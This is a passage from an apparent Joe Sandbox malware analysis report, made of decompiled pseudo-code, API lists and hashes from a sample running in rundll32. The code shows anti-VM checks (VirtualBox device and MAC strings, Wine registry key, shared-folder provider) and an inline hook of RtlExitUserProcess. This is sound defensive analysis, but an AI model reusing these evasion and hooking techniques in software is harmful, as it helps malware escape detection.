                                        				 *((intOrPtr*)( *_a32 + 0x10))();
                                        				if (_t63 != 0) goto 0x3871f2b8;
                                        				if (_a24 != 0) goto 0x3871f230;
                                        				 *((intOrPtr*)( *_a16 + 0x10))();
                                        				 *((intOrPtr*)( *_v88 + 0x10))();
                                        				 *((intOrPtr*)( *_a24 + 0x10))();
                                        				__imp__CoUninitialize(); // executed
                                        				return _t63;
                                        			}






















                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: String$AllocFreeUninitialize$ClearInitializeVariantwcsstr
                                        • String ID: DeviceId$PCI\VEN_80EE&DEV_CAFE$SELECT * FROM Win32_PnPEntity$WQL
                                        • API String ID: 1998430482-342862491
                                        • Opcode ID: 3218fba4ad21c45b7ae122e866a02fcffa20ebf14e771e57533e5baf3741b95b
                                        • Instruction ID: 61dd40fc8c26b32d4f1d5324f26f2feaa9e24f151683e2b38b0159531b3b36be
                                        • Opcode Fuzzy Hash: 3218fba4ad21c45b7ae122e866a02fcffa20ebf14e771e57533e5baf3741b95b
                                        • Instruction Fuzzy Hash: 50516937301B9086EB10DF25E884A9D77A4F788F98F04A516EE6E07B58DF38C685C301
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1126 1c33871ea40-1c33871ea6d call 1c3387211c0 1129 1c33871ec15-1c33871ec1f 1126->1129 1130 1c33871ea73-1c33871eab3 call 1c3388445f8 * 2 1126->1130 1135 1c33871eab5-1c33871eab8 1130->1135 1136 1c33871eb0a-1c33871eb12 1130->1136 1137 1c33871eaba-1c33871ead6 1135->1137 1138 1c33871eb01-1c33871eb04 SysFreeString 1135->1138 1139 1c33871eb14-1c33871eb17 SysFreeString 1136->1139 1140 1c33871eb1d-1c33871eb2a 1136->1140 1145 1c33871eae0-1c33871eae2 1137->1145 1138->1136 1139->1140 1141 1c33871ec05-1c33871ec14 1140->1141 1142 1c33871eb30-1c33871eb3f 1140->1142 1143 1c33871ebe5-1c33871ebff CoUninitialize 1142->1143 1144 1c33871eb45 1142->1144 1143->1141 1146 1c33871eb50-1c33871eb6d 1144->1146 1145->1138 1147 1c33871eae4-1c33871eafb CoUninitialize 1145->1147 1151 1c33871ebe1 1146->1151 1152 1c33871eb6f-1c33871eb8b 1146->1152 1147->1138 1151->1143 1155 1c33871eb91-1c33871eb93 1152->1155 1157 1c33871eb95-1c33871eb9d 1155->1157 1158 1c33871ebc4-1c33871ebd0 1155->1158 1157->1158 1159 1c33871eb9f-1c33871eba1 1157->1159 1158->1151 1163 1c33871ebd2-1c33871ebd9 1158->1163 1161 1c33871eba3-1c33871ebb6 call 1c33880e5b0 1159->1161 1162 1c33871ebba-1c33871ebbe VariantClear 1159->1162 1161->1162 1162->1158 1163->1146 1165 1c33871ebdf 1163->1165 1165->1143
                                        C-Code - Quality: 20%
                                        			E000001C31C33871EA40(void* __edx, void* __rax, long long __rdi, long long __rsi, long long __r12, long long __r14, char _a8, void* _a16, void* _a24, void* _a32) {
                                        				long long _v32;
                                        				long long _v40;
                                        				long long _v48;
                                        				long long _v56;
                                        				intOrPtr _v72;
                                        				signed short _v80;
                                        				void* _v88;
                                        				long long _v96;
                                        				long long _v104;
                                        				void* __rbx;
                                        				void* _t51;
                                        				void* _t52;
                                        				signed char _t58;
                                        				void* _t66;
                                        				void* _t90;
                                        				intOrPtr* _t99;
                                        				long long _t119;
                                        				void* _t130;
                                        				long long _t135;
                                        
                                        				_t119 = __rsi;
                                        				r15d = 0;
                                        				_a24 = _t135;
                                        				_v88 = _t135;
                                        				_a16 = _t135;
                                        				_t52 = E000001C31C3387211C0(_t51,  &_a24,  &_v88, __rsi); // executed
                                        				if (_t52 == 0) goto 0x3871ec15;
                                        				_v32 = _t119;
                                        				_v40 = __rdi;
                                        				_v48 = __r12;
                                        				_v56 = __r14;
                                        				__imp__#2();
                                        				__imp__#2();
                                        				r12d = 1;
                                        				r14d = r12d;
                                        				if (__rax == 0) goto 0x3871eb0a;
                                        				if (__rax == 0) goto 0x3871eb01;
                                        				_v96 =  &_a16;
                                        				_t13 = _t135 + 0x30; // 0x30
                                        				r9d = _t13;
                                        				_v104 = _t135;
                                        				if ( *((intOrPtr*)( *_a24 + 0xa0))() >= 0) goto 0x3871eb01;
                                        				r14d = r15d;
                                        				 *((intOrPtr*)( *_a24 + 0x10))();
                                        				 *((intOrPtr*)( *_v88 + 0x10))();
                                        				__imp__CoUninitialize();
                                        				__imp__#6();
                                        				if (__rax == 0) goto 0x3871eb1d;
                                        				__imp__#6();
                                        				if (r14d == 0) goto 0x3871ec05;
                                        				_t99 = _a16;
                                        				_a32 = _t135;
                                        				_a8 = r15d;
                                        				if (_t99 == 0) goto 0x3871ebe5;
                                        				asm("o16 nop [eax+eax]");
                                        				_v104 =  &_a8;
                                        				r8d = r12d; // executed
                                        				 *((intOrPtr*)( *_t99 + 0x20))();
                                        				if (_a8 == r15d) goto 0x3871ebe1;
                                        				_v96 = _t135;
                                        				r8d = 0;
                                        				_v104 = _t135;
                                        				if ( *((intOrPtr*)( *_a32 + 0x20))() < 0) goto 0x3871ebc4;
                                        				_t58 = _v80 & 0x0000ffff;
                                        				if (_t58 == r12w) goto 0x3871ebc4;
                                        				if ((_t58 & 0x00000008) == 0) goto 0x3871ebba;
                                        				E000001C31C33880E5B0(_t90, _v72, L"08:00:27", _v32,  *_a24, _t130);
                                        				_t66 =  !=  ? r12d : r15d;
                                        				__imp__#9();
                                        				 *((intOrPtr*)( *_a32 + 0x10))();
                                        				if (_t66 != 0) goto 0x3871ebe1;
                                        				if (_a16 != 0) goto 0x3871eb50;
                                        				goto 0x3871ebe5;
                                        				 *((intOrPtr*)( *_a16 + 0x10))();
                                        				 *((intOrPtr*)( *_a24 + 0x10))();
                                        				 *((intOrPtr*)( *_v88 + 0x10))();
                                        				__imp__CoUninitialize(); // executed
                                        				return _t66;
                                        			}

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: String$AllocFreeUninitialize$ClearInitializeVariantwcsstr
                                        • String ID: 08:00:27$MACAddress$SELECT * FROM Win32_NetworkAdapterConfiguration$WQL
                                        • API String ID: 1998430482-232164535
                                        • Opcode ID: 41be8ad4be726218d2bc0a84efcb0ac671832ba251f9ec78ef80c29be519ad74
                                        • Instruction ID: d6f53f0413c890dbff4f1b3c2ae73e84168cbd3322a1937d4ec05b5b87984bf7
                                        • Opcode Fuzzy Hash: 41be8ad4be726218d2bc0a84efcb0ac671832ba251f9ec78ef80c29be519ad74
                                        • Instruction Fuzzy Hash: DB515837301B9086EB209F25E884A9D77A1F784F98F04A516EE6E47F58DF38C685C301
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Path$AttributesCombineEnvironmentExpandFileFolderSpecialStrings
                                        • String ID: %ProgramW6432%
                                        • API String ID: 3127241168-1092591020
                                        • Opcode ID: e31e6983fb8e730e6e55048d195789d7b53ff78273e7e147f474fbb06369237e
                                        • Instruction ID: 578b10eb3e1d0691d0a67d0489d443dae4ad8f3977146e1d7cebd76c3564af28
                                        • Opcode Fuzzy Hash: e31e6983fb8e730e6e55048d195789d7b53ff78273e7e147f474fbb06369237e
                                        • Instruction Fuzzy Hash: 3E31A531654AC491FB219B28E406BE96371FFD4308F44A113DEA94BAA5EF3DC356CB01
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 18%
                                        			E000001C31C338720590(void* __r9) {
                                        				signed long long _v24;
                                        				char _v552;
                                        				void* _v1080;
                                        				char _v1584;
                                        				void* _v1608;
                                        				signed char _t17;
                                        				void* _t19;
                                        				void* _t23;
                                        				void* _t24;
                                        				signed long long _t29;
                                        				void* _t38;
                                        				void* _t41;
                                        				signed long long _t42;
                                        				void* _t43;
                                        				void* _t45;
                                        
                                        				_t45 = __r9;
                                        				_t29 =  *0x38903000; // 0x9bfaf736ae76
                                        				_v24 = _t29 ^ _t42;
                                        				r8d = 0x208;
                                        				E000001C31C33880E410(_t19, 0, _t23, _t24,  &_v552, _t38, _t41, _t43);
                                        				asm("movups xmm0, [0x19866b]");
                                        				asm("movsd xmm1, [0x19866c]");
                                        				r8d = 0x1f0;
                                        				asm("movaps [esp+0x20], xmm0");
                                        				asm("movsd [esp+0x30], xmm1");
                                        				E000001C31C33880E410(_t19, 0, _t23, _t24,  &_v1584, _t38, _t41, _t43);
                                        				if (E000001C31C338720E50() == 0) goto 0x38720610;
                                        				r8d = 0x104;
                                        				ExpandEnvironmentStringsW(??, ??, ??);
                                        				goto 0x3872061f;
                                        				r9d = 0;
                                        				_t5 = _t45 + 0x26; // 0x26
                                        				r8d = _t5;
                                        				__imp__SHGetSpecialFolderPathW();
                                        				__imp__PathCombineW();
                                        				_t17 = GetFileAttributesW(??); // executed
                                        				if (_t17 == 0xffffffff) goto 0x3872066e;
                                        				if ((_t17 & 0x00000010) == 0) goto 0x3872066e;
                                        				E000001C31C33880C290();
                                        				return 1;
                                        			}

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Path$AttributesCombineEnvironmentExpandFileFolderSpecialStrings
                                        • String ID: %ProgramW6432%
                                        • API String ID: 3127241168-1092591020
                                        • Opcode ID: f4e446950c117aaa7a5b22abb95a2542fa7d5a0f251ada8163812decc7223617
                                        • Instruction ID: 528ff0ed86b3dbc287d8ee24a2afe51448343be9c7e248b11aa930c3007ea599
                                        • Opcode Fuzzy Hash: f4e446950c117aaa7a5b22abb95a2542fa7d5a0f251ada8163812decc7223617
                                        • Instruction Fuzzy Hash: 1C219F722919C081FB60DB24E856BDA6322FBC9748F80A1139A6A4B9A5DF3DC355CB01
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 40%
                                        			E000001C31C338811DF0(void* __ecx, void* __edx, intOrPtr* __rax, long long __rbx, void* __rcx, long long __rsi, void* __r8, void* __r9, long long _a8, long long _a16, char _a24, intOrPtr _a40) {
                                        				long long _v16;
                                        				intOrPtr _v24;
                                        				void* _t12;
                                        				intOrPtr* _t34;
                                        				long long _t35;
                                        				intOrPtr* _t38;
                                        
                                        				_t34 = __rax;
                                        				_a8 = __rbx;
                                        				_a16 = __rsi;
                                        				if (__r8 != 0) goto 0x38811e20;
                                        				_t12 = E000001C31C338818984(__rax);
                                        				 *__rax = 0x16;
                                        				E000001C31C338811BC8(_t12);
                                        				goto 0x38811ea0;
                                        				E000001C31C338811D90(__rax, __rbx, __r8, __r9, __rcx);
                                        				_t38 = _t34;
                                        				if (_t34 == 0) goto 0x38811e70;
                                        				_t35 =  &_a24;
                                        				_v16 = _t35;
                                        				_v24 = _a40;
                                        				CreateThread(??, ??, ??, ??, ??, ??); // executed
                                        				if (_t35 != 0) goto 0x38811eb0;
                                        				E000001C31C338818914(GetLastError(), _t35, _t38);
                                        				if (_t38 == 0) goto 0x38811e9d;
                                        				if ( *((intOrPtr*)(_t38 + 0x10)) == 0) goto 0x38811e86;
                                        				CloseHandle(??);
                                        				if ( *((intOrPtr*)(_t38 + 0x18)) == 0) goto 0x38811e95;
                                        				FreeLibrary(??);
                                        				return E000001C31C338824EE0(_t35, _t38);
                                        			}

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseCreateErrorFreeHandleLastLibraryThread_invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 2067211477-0
                                        • Opcode ID: b51c7cb60d147e5c0669e2db15bcc3ed022d0b02608c378374a75aaf55dc55d9
                                        • Instruction ID: 6073fa6121675ebc390963792bb7ee76e2e65a91a86ddfd70bc2dbaf3ee0f694
                                        • Opcode Fuzzy Hash: b51c7cb60d147e5c0669e2db15bcc3ed022d0b02608c378374a75aaf55dc55d9
                                        • Instruction Fuzzy Hash: 6221A43A3417C042FE04CFA1A410AE963A1BF84BC0F08A423DE294B785DF3CC7008642
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Close$OpenQueryValue
                                        • String ID:
                                        • API String ID: 1607946009-0
                                        • Opcode ID: 80fb25d1c761cdd6296609965d16f533f97d65c48d945b5779956fb6042f6aac
                                        • Instruction ID: 4c2418656d7868cd44b8d00b13f7d3c06fe45bf735ad53ba7b768897dabad2ff
                                        • Opcode Fuzzy Hash: 80fb25d1c761cdd6296609965d16f533f97d65c48d945b5779956fb6042f6aac
                                        • Instruction Fuzzy Hash: E3219933365AD042FB608B11F844B9B63A1FBC8BC4F40A126AE9D4BB54DF3CC6548B00
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Virtual$AllocQuery
                                        • String ID:
                                        • API String ID: 31662377-0
                                        • Opcode ID: b56fdc160a3053fb9bded151c2404bcb637792cd7786b653b91c43bb34dcc33a
                                        • Instruction ID: c7fe4e07989fb5abd603eb22b5c56e50d95ef5a0e10957e7bb16454879e1e018
                                        • Opcode Fuzzy Hash: b56fdc160a3053fb9bded151c2404bcb637792cd7786b653b91c43bb34dcc33a
                                        • Instruction Fuzzy Hash: 913194317466C481FF214B11959CB956392B348FD0F18E526ED6E1BF88DB7CC7818781
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 37%
                                        			E000001C31C33871B69C(void* __edi, long long __rax, long long __rbx, long long __rdi, long long __r9, long long _a8, long long _a16, char _a32) {
                                        				void* _t16;
                                        				intOrPtr _t24;
                                        				void* _t25;
                                        				long long _t42;
                                        				intOrPtr* _t43;
                                        				signed long long _t44;
                                        				intOrPtr* _t52;
                                        				intOrPtr _t53;
                                        				void* _t61;
                                        				char* _t63;
                                        
                                        				_t60 = __r9;
                                        				_t42 = __rax;
                                        				_a8 = __rbx;
                                        				_a16 = __rdi;
                                        				_a32 = __r9;
                                        				GetModuleHandleA(??);
                                        				if (__rax == 0) goto 0x3871b765;
                                        				_a32 = __rax;
                                        				E000001C31C33871C2B0(_t25,  &_a32, "RtlExitUserProcess", _t61); // executed
                                        				if (_t42 == 0) goto 0x3871b765;
                                        				 *0x3890b29c = 1;
                                        				if ( *0x3890b29c == 1) goto 0x3871b6ea;
                                        				_t52 =  *0x3890b508;
                                        				if (_t52 == 0) goto 0x3871b74f;
                                        				_t24 =  *0x3890b514;
                                        				if (_t24 == 0) goto 0x3871b723;
                                        				_t43 = _t52;
                                        				if ( *_t43 == 0) goto 0x3871b759;
                                        				_t44 = _t43 + 0x3c;
                                        				if (1 - _t24 < 0) goto 0x3871b715;
                                        				if (1 == 0xffffffff) goto 0x3871b74f;
                                        				_t63 = _t44 * 0x3c + _t52;
                                        				_t53 = _a32;
                                        				 *((long long*)(_t63 + 1)) = _t42;
                                        				_t16 = E000001C31C33871B4BC(_t44, __rbx, _t63, _t53, _t42, _t60); // executed
                                        				if (_t16 != 0) goto 0x3871b74f;
                                        				 *_t63 = 0;
                                        				 *0x3890b29c = 0;
                                        				goto 0x3871b768;
                                        				 *((char*)(_t44 * 0x3c + _t53)) = 1;
                                        				goto 0x3871b726;
                                        				return 0xffffffff;
                                        			}

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: HandleModulelstrcmp
                                        • String ID: RtlExitUserProcess$ntdll.dll
                                        • API String ID: 4066981444-1735925572
                                        • Opcode ID: 4db69128b072396db0a7319d1b8295cadff92eb00c7c4801250883dabf3213f8
                                        • Instruction ID: 71d786264fe9ddc72f1395be5df15727a7dcdd876d2698b41a1a9dede0c2a6f6
                                        • Opcode Fuzzy Hash: 4db69128b072396db0a7319d1b8295cadff92eb00c7c4801250883dabf3213f8
                                        • Instruction Fuzzy Hash: 3121DA71345BC041FA15CB1DA89CBA86693BB853A0F18E217D97D47FE4EB39C641C701
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 34%
                                        			E000001C31C33871E8F0() {
                                        				signed long long _v24;
                                        				char _v552;
                                        				intOrPtr _v568;
                                        				int _t11;
                                        				void* _t13;
                                        				void* _t18;
                                        				void* _t19;
                                        				signed long long _t23;
                                        				void* _t29;
                                        				void* _t32;
                                        				signed long long _t33;
                                        				void* _t34;
                                        
                                        				_t23 =  *0x38903000; // 0x9bfaf736ae76
                                        				_v24 = _t23 ^ _t33;
                                        				r8d = 0x208;
                                        				E000001C31C33880E410(_t13, 0, _t18, _t19,  &_v552, _t29, _t32, _t34);
                                        				_v568 = 0x104;
                                        				_t11 = WNetGetProviderNameW(??, ??, ??); // executed
                                        				if (_t11 != 0) goto 0x3871e96f;
                                        				__imp__StrCmpIW();
                                        				E000001C31C33880C290();
                                        				return 0 | _t11 == 0x00000000;
                                        			}

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: NameProvider
                                        • String ID: VirtualBox Shared Folders
                                        • API String ID: 262172401-2247368375
                                        • Opcode ID: 47de9dabbb41c250f91913fc77dcf4a50a5d8604f73302efefae0fb9d738503c
                                        • Instruction ID: e858b28a44c7e641aaed4400445a943c7c11c88b654484dd1798df792a160625
                                        • Opcode Fuzzy Hash: 47de9dabbb41c250f91913fc77dcf4a50a5d8604f73302efefae0fb9d738503c
                                        • Instruction Fuzzy Hash: 54016776365AC092FBA0DB64F8557DA2361F7C8744FC06017D95E8A655EF3CC3048B01
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseOpen
                                        • String ID: SOFTWARE\Wine
                                        • API String ID: 47109696-1166244655
                                        • Opcode ID: 508ce3090052390ecea74677034d38ef4e635124e9f833a977fb632fa3428459
                                        • Instruction ID: 8eb5faebf2612657d2b1a01ba3d86129718e0f26fe86a24eb9d9885fd21b7863
                                        • Opcode Fuzzy Hash: 508ce3090052390ecea74677034d38ef4e635124e9f833a977fb632fa3428459
                                        • Instruction Fuzzy Hash: E5F08936711AC082FBA09B61F455B9A63A0F7C8744F806113ED6D4B786EF3CC244CB01
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 65%
                                        			E000001C31C338826904(void* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rsi, void* __r9, long long _a8, long long _a16) {
                                        				void* _t6;
                                        				void* _t11;
                                        				intOrPtr _t13;
                                        				intOrPtr _t16;
                                        				void* _t27;
                                        				void* _t33;
                                        				void* _t36;
                                        
                                        				_t33 = __rdx;
                                        				_t31 = __rcx;
                                        				_t29 = __rbx;
                                        				_t27 = __rax;
                                        				_a8 = __rbx;
                                        				_a16 = __rsi;
                                        				GetLastError();
                                        				_t13 =  *0x389032b0; // 0x7
                                        				if (_t13 == 0xffffffff) goto 0x38826935;
                                        				_t6 = E000001C31C338826F7C(_t13, _t13 - 0xffffffff, __rax, __rbx, __rcx);
                                        				if (__rax != 0) goto 0x38826976;
                                        				E000001C31C338822114(_t6, _t31, _t33); // executed
                                        				_t36 = _t27;
                                        				if (_t27 != 0) goto 0x38826955;
                                        				E000001C31C338824EE0(_t27, _t31);
                                        				goto 0x3882697b;
                                        				_t16 =  *0x389032b0; // 0x7
                                        				if (E000001C31C338826FD4(_t16, _t27, _t27, _t29, _t31, _t27, __rsi) == 0) goto 0x3882694e;
                                        				E000001C31C3388265DC(_t36, _t27);
                                        				_t11 = E000001C31C338824EE0(_t27, _t36);
                                        				if (_t36 != 0) goto 0x38826985;
                                        				SetLastError(??);
                                        				goto 0x38826990;
                                        				SetLastError(??);
                                        				return _t11;
                                        			}











                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLast
                                        • String ID:
                                        • API String ID: 1452528299-0
                                        • Opcode ID: 5f7c3cdbe70bcf1203e98d7aed0c86dfc712dabaf6b4182bb22bdb7db2f05dbd
                                        • Instruction ID: f47cb978e61f0e3f2dc0643bd9cc8247e57ac96f0d5c940ab9d421c6520212e1
                                        • Opcode Fuzzy Hash: 5f7c3cdbe70bcf1203e98d7aed0c86dfc712dabaf6b4182bb22bdb7db2f05dbd
                                        • Instruction Fuzzy Hash: BD11A1313817D043FB99DB25E505FA961A6BB48BE0F00E52BAD7A0F7D6DE28CB414702
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: GlobalMemoryStatus
                                        • String ID: @
                                        • API String ID: 1890195054-2766056989
                                        • Opcode ID: 36c4e4fc9a72edbeb5d665243015828acae3b8321c3bf15e408e2c7754fcf596
                                        • Instruction ID: 8d1a3883004b793112808f1341611ee784c2d0521d460725b5a87604d601ef4f
                                        • Opcode Fuzzy Hash: 36c4e4fc9a72edbeb5d665243015828acae3b8321c3bf15e408e2c7754fcf596
                                        • Instruction Fuzzy Hash: E0F0E77661AF5089EB90CB62A80938D33E5F34C740F524139D6AD86700EE39C6118F01
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 29%
                                        			E000001C31C33871B4BC(signed int __rax, long long __rbx, void* __rcx, long long __rdx, long long __r8, signed int __r9, long long _a8, char _a24, intOrPtr _a25, char _a28, signed int _a32) {
                                        				long long _v40;
                                        				void* __rsi;
                                        				void* __rbp;
                                        				signed char _t56;
                                        				int _t61;
                                        				void* _t65;
                                        				void* _t66;
                                        				void* _t73;
                                        				void* _t78;
                                        				signed char _t88;
                                        				signed long long _t92;
                                        				long long _t94;
                                        				void* _t97;
                                        				signed long long _t107;
                                        				intOrPtr* _t108;
                                        				signed long long _t109;
                                        				intOrPtr* _t111;
                                        				void* _t117;
                                        				long long _t118;
                                        				void* _t119;
                                        				long long _t120;
                                        				char* _t126;
                                        				intOrPtr* _t128;
                                        
                                        				_a8 = __rbx;
                                        				_a32 = __r9;
                                        				_a24 = __r8;
                                        				r9d = r9d | 0xffffffff;
                                        				r10d = 0;
                                        				_t118 = __rdx;
                                        				_t97 = __rcx;
                                        				if ( *0x3890b514 - r10d <= 0) goto 0x3871b546;
                                        				_t107 = __rax * 0x3c;
                                        				_t92 =  *0x3890b508;
                                        				if ( *((char*)(_t107 + _t92)) == 0) goto 0x3871b533;
                                        				if ( *((intOrPtr*)(_t107 + _t92 + 0x28)) != __rdx) goto 0x3871b533;
                                        				_t108 =  *((intOrPtr*)(_t107 + _t92 + 0x30));
                                        				r8d = 0;
                                        				_t78 =  *_t108 - r8d;
                                        				if (_t78 <= 0) goto 0x3871b52d;
                                        				asm("lock bts dword [ecx+edx+0x4], 0x0");
                                        				if (_t78 >= 0) goto 0x3871b52a;
                                        				r8d = r8d + 1;
                                        				if (r8d -  *_t108 < 0) goto 0x3871b510;
                                        				goto 0x3871b52d;
                                        				r9d = r8d;
                                        				if (r9d != 0xffffffff) goto 0x3871b541;
                                        				r10d = r10d + 1;
                                        				if (r10d -  *0x3890b514 < 0) goto 0x3871b4e8;
                                        				if (_t108 != 0) goto 0x3871b566;
                                        				E000001C31C33871B7D8(_t66, _t92, __rcx, __rdx, __rdx, _t119); // executed
                                        				_t109 = _t92;
                                        				if (_t92 == 0) goto 0x3871b56a;
                                        				 *_t92 = 0x42;
                                        				r9d = 0;
                                        				 *((intOrPtr*)(_t92 + 4)) = 1;
                                        				 *(_t97 + 0x38) = r9d;
                                        				 *(_t97 + 0x30) = _t109;
                                        				if (_t109 != 0) goto 0x3871b57a;
                                        				goto 0x3871b68e;
                                        				r8d = 0x2c;
                                        				_t117 = _t92 * 0x3e + _t109;
                                        				_t13 = _t117 + 0x16; // 0x16
                                        				_t120 = _t13;
                                        				E000001C31C33871B77C(0x90, _t120);
                                        				_t56 = E000001C31C33871C02C(_t65, 0x90, _t73, _t97,  *((intOrPtr*)(_t97 + 1)), _t120);
                                        				 *(_t97 + 9) = _t56 & 0x000000ff;
                                        				if (_t56 != 0) goto 0x3871b5b4;
                                        				 *(_t117 + 4) =  *(_t117 + 4) & 0x00000000;
                                        				goto 0x3871b573;
                                        				_t111 =  *((intOrPtr*)(_t97 + 1));
                                        				_t126 = _t97 + 0xa;
                                        				if (_t126 == 0) goto 0x3871b5da;
                                        				if (_t111 == 0) goto 0x3871b5da;
                                        				_t88 = _t56;
                                        				if (_t88 == 0) goto 0x3871b5da;
                                        				 *_t126 =  *_t111;
                                        				if (_t88 != 0) goto 0x3871b5ca;
                                        				 *((long long*)(_t97 + 0x28)) = _t118;
                                        				_t21 = _t117 + 4; // 0x4
                                        				 *0x3890b290 = _t120;
                                        				 *(_t117 + 0xa) =  *(_t117 + 0xa) & 0x00000000;
                                        				_a25 = _t21 -  *((intOrPtr*)(_t97 + 1)) - 1;
                                        				r9d = 0x40;
                                        				 *((short*)(_t117 + 8)) = 0x25ff;
                                        				 *((long long*)(_t117 + 0xe)) = 0x1c3386e7660;
                                        				r8d =  *(_t97 + 9) & 0x000000ff;
                                        				_t94 =  &_a32;
                                        				_v40 = _t94;
                                        				_a24 = 0xe9;
                                        				_t61 = VirtualProtectEx(??, ??, ??, ??, ??); // executed
                                        				if (_t61 == 0) goto 0x3871b5ae;
                                        				 *(_t117 + 0x36) =  *(_t117 + 0x36) & 0x00000000;
                                        				 *((short*)(_t117 + 0x34)) = 0x25ff;
                                        				 *((long long*)(_t117 + 0x3a)) = _t94 +  *((intOrPtr*)(_t97 + 1));
                                        				_t128 =  *((intOrPtr*)(_t97 + 1));
                                        				if (_t128 == 0) goto 0x3871b668;
                                        				 *_t128 = _a24;
                                        				 *((char*)(_t128 + 4)) = _a28;
                                        				r8d =  *(_t97 + 9) & 0x000000ff;
                                        				r9d = _a32;
                                        				_v40 =  &_a32;
                                        				VirtualProtectEx(??, ??, ??, ??, ??); // executed
                                        				return 1;
                                        			}



























                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ProtectVirtual
                                        • String ID:
                                        • API String ID: 544645111-0
                                        • Opcode ID: 9fb0c2c09bb39161c8a4ff82b7e0cb5fb1810189b0aab8124f3229747900a979
                                        • Instruction ID: 16601884616c1a19faf8da27cbfd97209790c0c3d66d3114e2229bf58c32ab24
                                        • Opcode Fuzzy Hash: 9fb0c2c09bb39161c8a4ff82b7e0cb5fb1810189b0aab8124f3229747900a979
